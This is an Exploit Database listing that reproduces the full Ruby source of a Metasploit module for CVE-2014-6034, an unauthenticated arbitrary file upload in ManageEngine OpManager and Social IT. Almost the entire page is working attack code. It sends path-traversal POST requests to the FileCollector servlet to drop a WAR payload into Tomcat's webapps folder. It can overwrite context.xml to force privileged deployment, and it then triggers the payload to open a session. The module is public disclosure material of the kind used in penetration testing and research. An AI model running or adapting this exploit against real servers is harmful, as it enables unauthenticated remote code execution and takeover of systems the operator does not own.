ManageEngine OpManager / Social IT – Arbitrary File Upload (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Pedro Ribeiro
  日期： 2014-10-02
• 类别：

  • remote
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/34867/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'ManageEngine OpManager / Social IT Arbitrary File Upload',
  'Description' => %q{
  This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
  The vulnerability exists in the FileCollector servlet which accepts unauthenticated
  file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
  version 11.0 of SocialIT for Windows and Linux.
  },
  'Author' =>
  [
  'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
  ],
  'License' => MSF_LICENSE,
  'References'=>
  [
  [ 'CVE', '2014-6034' ],
  [ 'OSVDB', '112276' ],
  [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
  [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
  ],
  'Privileged'=> true,
  'Platform'=> 'java',
  'Arch'=> ARCH_JAVA,
  'Targets' =>
  [
  [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
  ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Sep 27 2014'))
  
  register_options(
  [
  Opt::RPORT(80),
  OptInt.new('SLEEP',
  [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
  ], self.class)
  end
  
  def check
  res = send_request_cgi({
  'uri'=> normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
  'method' => 'GET'
  })
  
  # A GET request on this servlet returns "405 Method not allowed"
  if res and res.code == 405
  return Exploit::CheckCode::Detected
  end
  
  return Exploit::CheckCode::Safe
  end
  
  
  def upload_war_and_exec(try_again, app_base)
  tomcat_path = '../../../tomcat/'
  servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'
  
  if try_again
  # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
  # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
  # The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
  # After replacing the context.xml file let's upload the WAR again.
  print_status("#{peer} - Replacing Tomcat context file")
  send_request_cgi({
  'uri' => normalize_uri(servlet_path),
  'method' => 'POST',
  'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
  'ctype' => 'application/xml',
  'vars_get' => {
  'regionID' => tomcat_path + "conf",
  'FILENAME' => "context.xml"
  }
  })
  else
  # We need to create the upload directories before our first attempt to upload the WAR.
  print_status("#{peer} - Creating upload directories")
  bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
  send_request_cgi({
  'uri' => normalize_uri(servlet_path),
  'method' => 'POST',
  'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
  'ctype' => 'application/xml',
  'vars_get' => {
  'regionID' => "",
  'FILENAME' => bogus_file
  }
  })
  register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
  end
  
  war_payload = payload.encoded_war({ :app_name => app_base }).to_s
  
  print_status("#{peer} - Uploading WAR file...")
  res = send_request_cgi({
  'uri' => normalize_uri(servlet_path),
  'method' => 'POST',
  'data' => war_payload,
  'ctype' => 'application/octet-stream',
  'vars_get' => {
  'regionID' => tomcat_path + "webapps",
  'FILENAME' => app_base + ".war"
  }
  })
  
  # The server either returns a 500 error or a 200 OK when the upload is successful.
  if res and (res.code == 500 or res.code == 200)
  print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
  " seconds for deployment")
  sleep(datastore['SLEEP'])
  else
  fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
  end
  
  print_status("#{peer} - Executing payload, wait for session...")
  send_request_cgi({
  'uri'=> normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
  'method' => 'GET'
  })
  end
  
  
  def exploit
  app_base = rand_text_alphanumeric(4 + rand(32 - 4))
  
  upload_war_and_exec(false, app_base)
  register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
  
  sleep_counter = 0
  while not session_created?
  if sleep_counter == datastore['SLEEP']
  print_error("#{peer} - Failed to get a shell, let's try one more time")
  upload_war_and_exec(true, app_base)
  return
  end
  
  sleep(1)
  sleep_counter += 1
  end
  end
  end